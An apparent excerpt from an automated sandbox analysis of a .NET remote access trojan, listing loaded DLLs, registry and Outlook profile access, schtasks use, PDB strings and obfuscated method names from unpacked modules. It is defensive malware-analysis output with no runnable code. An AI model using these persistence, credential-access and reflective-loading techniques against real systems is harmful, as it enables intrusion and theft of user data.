                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: dpapi.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: \??\C:\Windows\mscorlib.pdb T source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.ni.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.ni.pdbRSDS source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: n.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdbXT source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\exe\PHCUmkeAjDPT.pdb#x source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.pdbd source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: \??\C:\Windows\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.PDB source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: PHCUmkeAjDPT.pdbeAjDPT.pdbpdbDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Xml.pdbd source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.Configuration.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: \??\C:\Windows\exe\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.Core.ni.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: n8C:\Windows\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, zDAKFK.exe.0.dr
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: PHCUmkeAjDPT.pdbSHA256 source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, zDAKFK.exe.0.dr
                Source: Binary string: System.pdbH source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: mscorlib.ni.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: symbols\exe\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: C:\Windows\PHCUmkeAjDPT.pdbpdbDPT.pdb li source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: PHCUmkeAjDPT.pdb089 source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.ni.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: \??\C:\Windows\symbols\exe\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: nC:\Users\user\Desktop\PHCUmkeAjDPT.pdbp source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Core.ni.pdbRSDS source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: \??\C:\Windows\PHCUmkeAjDPT.pdb8B source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, DcHUM92j2w5Tv1Pf7E.cs .Net Code: ciZouWdrpu System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4309428.1.raw.unpack, XlF5VlCIHRSQX8M5eh.cs .Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, DcHUM92j2w5Tv1Pf7E.cs .Net Code: ciZouWdrpu System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, DcHUM92j2w5Tv1Pf7E.cs .Net Code: ciZouWdrpu System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.7b30000.5.raw.unpack, XlF5VlCIHRSQX8M5eh.cs .Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe Code function: 0_2_093B173C push 43E8CE8Bh; iretd 0_2_093B175A
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe Code function: 12_2_0509F3F0 push eax; iretd 12_2_0509F3F1
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe Code function: 16_2_00D99C30 push esp; retf 0271h 16_2_00D99D55
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe Static PE information: section name: .text entropy: 7.689431828463277
                Source: zDAKFK.exe.0.dr Static PE information: section name: .text entropy: 7.689431828463277
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, Geok9UDGmJnESskYk6.cs High entropy of concatenated method names: 'nEAuD0lDn', 'k6knAiJLk', 'NloI2QMWq', 'KfKGdF0FP', 'KDpyRwXgc', 'l5eJJqFdM', 'Ef5wrNDDaRAkXCrfUm', 'ygWAKiwbjKOGy9eQqM', 'RZ53xaKq7', 'Lj48UhUGh'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, DcHUM92j2w5Tv1Pf7E.cs High entropy of concatenated method names: 'fnKjroV6RR', 'o6TjVopft1', 'A7xj4l2Rcm', 'M2oj6QPVBi', 'qr1jUxRYoE', 'hs1jQnVh75', 'miJj7QKrPL', 'svIjlO0gMn', 'TqWj17sIZZ', 'jI2jqCjhhM'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, bieio6Q9YImFOfmWOy.cs High entropy of concatenated method names: 'Dispose', 'g5fXkaxBTb', 'n85MfiuDfO', 'Y0MKKFMbmB', 'Cw0Xxx2xPK', 'db1Xz8FYVX', 'ProcessDialogKey', 'LC3M2Sk8LB', 'FA6MX2cHyd', 'PMWMML8Uk9'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, ItnMZkLQR3l5sMrDFi.cs High entropy of concatenated method names: 'BNSSeIG0I3', 'LWsSxsmWTZ', 'QxR32nE91b', 'ODp3XZEqUS', 'wXISpl75aY', 'nESSmP5KSi', 'DMdS9D90ev', 'qt9SwiKkhJ', 'pSpSd5QdyB', 'eKRScXxLIg'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, ux2XFhK0MLC0DLZuGq.cs High entropy of concatenated method names: 'ToString', 'xifRpvoUtT', 'HqNRf5GyUA', 'zWsRDOyO3X', 'xnfRO1JkJw', 'muNRT7MmVO', 'TWwR5ui3bs', 'it3RsdXfZS', 'lKuRaGw3XJ', 'e5VRNmgRoA'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, FPXSFTjke38EUsFwMQ.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'HARMkwNTfr', 'sx2MxnZmMN', 'i3bMzVPvtO', 'ri7j2Lt4bc', 'gqUjXW55to', 'hcAjMibAaD', 'IHijjudiKN', 'xIrfD5giXHZVB1KKgWh'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, bIslAo5xLyfYTdWbDU.cs High entropy of concatenated method names: 'DPl3PkK2h7', 'IWt3fN2uIq', 'LXt3DGvDLf', 'ol43Oj0Eeb', 'R513w93ZMD', 'SPw3TlkZK6', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, FFL5rbCmJqMKZgE8Ip.cs High entropy of concatenated method names: 'Qg9Qr8M1aB', 'jBtQ4y5U8S', 'yyIQUAXgLV', 'BTlQ7ZNm8J', 'eQsQlPSiK6', 'JHsUF6o9hO', 'VTlUtXKxve', 'OgLUBcjPaD', 'gYqUes9vBM', 'tp3UkUqHWu'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, lM8lcJnctlp2rWEnaI.cs High entropy of concatenated method names: 'hM63V4GChJ', 'Uw93410JmR', 'vGo36cdFBE', 'mS83UZ6rWu', 'gPJ3Qp4GKk', 'cwq37Bqjsw', 'lHQ3lQCN7r', 'k0q31Oc95C', 'piO3qePxMh', 'RV83AIUcqk'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, ajVBtPWDB3rCCiSSxWl.cs High entropy of concatenated method names: 'TvS8hsl079', 'BpC80PGBUq', 'hHi8upt9Tq', 'aFWeEvNK5eLYuKxZYuY', 'ipUWJANRjm73Mckjsbc', 'dl5qgJN3De1xmI04NgQ', 'yho2lTNVIfBMH3UHw9K'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, oho6rBSwnEYaeTlMlB.cs High entropy of concatenated method names: 'vxR7hQ9VS9', 'aXn70nv0lH', 'gDu7uEjRYq', 'piL7n98WSr', 'udI7i7hd9y', 'gQk7IMYbZi', 'fVQ7GXQv3c', 'x1Q7gmyfHx', 'ama7y12TMu', 'ToT7JT0Bns'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, J1eemHk4KmHXVbcVHe.cs High entropy of concatenated method names: 'PcWbgGdFBM', 'DgEbyqnfhj', 'sDxbPXFvBp', 'tl8bf0pds1', 'BNGbOn81il', 'IMObTmJJEI', 'eqQbs6wu2l', 'z4SbauVDSu', 'ra7bL7Na1k', 'IKjbpfbeAG'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, ohCSjHuOgcn8LMxW9w.cs High entropy of concatenated method names: 'wLEX7IhQ8w', 'L0SXl63BU3', 'J3CXqrtr0y', 'DfgXA2eSrf', 'R3TXCMeP42', 'oWhXRxxmcY', 'rrWcP43uvOFI7CVamN', 'PKSmfGVXc5QutPn4RS', 'JDkXXVFE8r', 'lfpXjDHdio'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, fEaTuDV8YOyfDce1Gr.cs High entropy of concatenated method names: 'lJs7VRZSi3', 'Pch76HnPE6', 'waL7QuYVud', 'Xe8QxrPnSy', 'SUjQzWLoNN', 'oOh7275Eic', 'LII7XdfUd5', 'OXG7MASNLV', 'o6L7j0oV8F', 'TMe7oj4S8y'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, eCybnUUGdbGwloyBj7.cs High entropy of concatenated method names: 'QcS6nNfy65', 'IZj6IpejFk', 'J3C6glZtoH', 'kRv6yxFKDR', 'Qud6CMvJOW', 'asl6RRwfej', 'n306S9Jh19', 'AsT63X21Ik', 'cVo6v9poYX', 'hhV68dyQr0'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, Pc5EbqW7of4KtsoFdbm.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NoH8wIUguG', 'z1e8dajAAa', 'Obh8cBPX6Y', 'o0W8YxhQ2K', 'p0M8FlvC35', 'F1k8t8QTfI', 'RHG8BnG5lg'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, qPR26bWP9YqtF728xSp.cs High entropy of concatenated method names: 'rG5vh3TwnH', 'JMZv00OnlN', 'IhcvuAp9uB', 'IUmvnj8rYN', 'yO3viJ2jZr', 's7avI5fHjc', 'wu3vGubmmw', 'yffvgg3opd', 'RyxvyVMUVR', 'ITtvJ6ejkq'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, tc6CFuwhhqKghWoavi.cs High entropy of concatenated method names: 'TC64wchO6y', 'PSm4dLZtRE', 'tCh4c64gPb', 'oKU4YE6WmO', 'F7g4Fein1R', 'brc4tHW8Lh', 'MYS4ByTvYv', 'QoU4eZpQZ3', 'rAi4kEaZqd', 'HOl4xEOCIS'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, KpGIMg9jS35kOWayWB.cs High entropy of concatenated method names: 'iRavXJdJoL', 'j28vjYJ1on', 'cO5vo0QZkb', 'B09vVhU1fN', 'vlgv4Y1pix', 'KpGvUtP7Ip', 'bRkvQolkVR', 'RT53BmPGue', 's8w3eZfM1l', 'zSi3kXysor'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, Geok9UDGmJnESskYk6.cs High entropy of concatenated method names: 'nEAuD0lDn', 'k6knAiJLk', 'NloI2QMWq', 'KfKGdF0FP', 'KDpyRwXgc', 'l5eJJqFdM', 'Ef5wrNDDaRAkXCrfUm', 'ygWAKiwbjKOGy9eQqM', 'RZ53xaKq7', 'Lj48UhUGh'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, DcHUM92j2w5Tv1Pf7E.cs High entropy of concatenated method names: 'fnKjroV6RR', 'o6TjVopft1', 'A7xj4l2Rcm', 'M2oj6QPVBi', 'qr1jUxRYoE', 'hs1jQnVh75', 'miJj7QKrPL', 'svIjlO0gMn', 'TqWj17sIZZ', 'jI2jqCjhhM'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, bieio6Q9YImFOfmWOy.cs High entropy of concatenated method names: 'Dispose', 'g5fXkaxBTb', 'n85MfiuDfO', 'Y0MKKFMbmB', 'Cw0Xxx2xPK', 'db1Xz8FYVX', 'ProcessDialogKey', 'LC3M2Sk8LB', 'FA6MX2cHyd', 'PMWMML8Uk9'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, ItnMZkLQR3l5sMrDFi.cs High entropy of concatenated method names: 'BNSSeIG0I3', 'LWsSxsmWTZ', 'QxR32nE91b', 'ODp3XZEqUS', 'wXISpl75aY', 'nESSmP5KSi', 'DMdS9D90ev', 'qt9SwiKkhJ', 'pSpSd5QdyB', 'eKRScXxLIg'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, ux2XFhK0MLC0DLZuGq.cs High entropy of concatenated method names: 'ToString', 'xifRpvoUtT', 'HqNRf5GyUA', 'zWsRDOyO3X', 'xnfRO1JkJw', 'muNRT7MmVO', 'TWwR5ui3bs', 'it3RsdXfZS', 'lKuRaGw3XJ', 'e5VRNmgRoA'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, FPXSFTjke38EUsFwMQ.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'HARMkwNTfr', 'sx2MxnZmMN', 'i3bMzVPvtO', 'ri7j2Lt4bc', 'gqUjXW55to', 'hcAjMibAaD', 'IHijjudiKN', 'xIrfD5giXHZVB1KKgWh'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, bIslAo5xLyfYTdWbDU.cs High entropy of concatenated method names: 'DPl3PkK2h7', 'IWt3fN2uIq', 'LXt3DGvDLf', 'ol43Oj0Eeb', 'R513w93ZMD', 'SPw3TlkZK6', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, FFL5rbCmJqMKZgE8Ip.cs High entropy of concatenated method names: 'Qg9Qr8M1aB', 'jBtQ4y5U8S', 'yyIQUAXgLV', 'BTlQ7ZNm8J', 'eQsQlPSiK6', 'JHsUF6o9hO', 'VTlUtXKxve', 'OgLUBcjPaD', 'gYqUes9vBM', 'tp3UkUqHWu'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, lM8lcJnctlp2rWEnaI.cs High entropy of concatenated method names: 'hM63V4GChJ', 'Uw93410JmR', 'vGo36cdFBE', 'mS83UZ6rWu', 'gPJ3Qp4GKk', 'cwq37Bqjsw', 'lHQ3lQCN7r', 'k0q31Oc95C', 'piO3qePxMh', 'RV83AIUcqk'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, ajVBtPWDB3rCCiSSxWl.cs High entropy of concatenated method names: 'TvS8hsl079', 'BpC80PGBUq', 'hHi8upt9Tq', 'aFWeEvNK5eLYuKxZYuY', 'ipUWJANRjm73Mckjsbc', 'dl5qgJN3De1xmI04NgQ', 'yho2lTNVIfBMH3UHw9K'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, oho6rBSwnEYaeTlMlB.cs High entropy of concatenated method names: 'vxR7hQ9VS9', 'aXn70nv0lH', 'gDu7uEjRYq', 'piL7n98WSr', 'udI7i7hd9y', 'gQk7IMYbZi', 'fVQ7GXQv3c', 'x1Q7gmyfHx', 'ama7y12TMu', 'ToT7JT0Bns'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, J1eemHk4KmHXVbcVHe.cs High entropy of concatenated method names: 'PcWbgGdFBM', 'DgEbyqnfhj', 'sDxbPXFvBp', 'tl8bf0pds1', 'BNGbOn81il', 'IMObTmJJEI', 'eqQbs6wu2l', 'z4SbauVDSu', 'ra7bL7Na1k', 'IKjbpfbeAG'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, ohCSjHuOgcn8LMxW9w.cs High entropy of concatenated method names: 'wLEX7IhQ8w', 'L0SXl63BU3', 'J3CXqrtr0y', 'DfgXA2eSrf', 'R3TXCMeP42', 'oWhXRxxmcY', 'rrWcP43uvOFI7CVamN', 'PKSmfGVXc5QutPn4RS', 'JDkXXVFE8r', 'lfpXjDHdio'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, fEaTuDV8YOyfDce1Gr.cs High entropy of concatenated method names: 'lJs7VRZSi3', 'Pch76HnPE6', 'waL7QuYVud', 'Xe8QxrPnSy', 'SUjQzWLoNN', 'oOh7275Eic', 'LII7XdfUd5', 'OXG7MASNLV', 'o6L7j0oV8F', 'TMe7oj4S8y'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, eCybnUUGdbGwloyBj7.cs High entropy of concatenated method names: 'QcS6nNfy65', 'IZj6IpejFk', 'J3C6glZtoH', 'kRv6yxFKDR', 'Qud6CMvJOW', 'asl6RRwfej', 'n306S9Jh19', 'AsT63X21Ik', 'cVo6v9poYX', 'hhV68dyQr0'
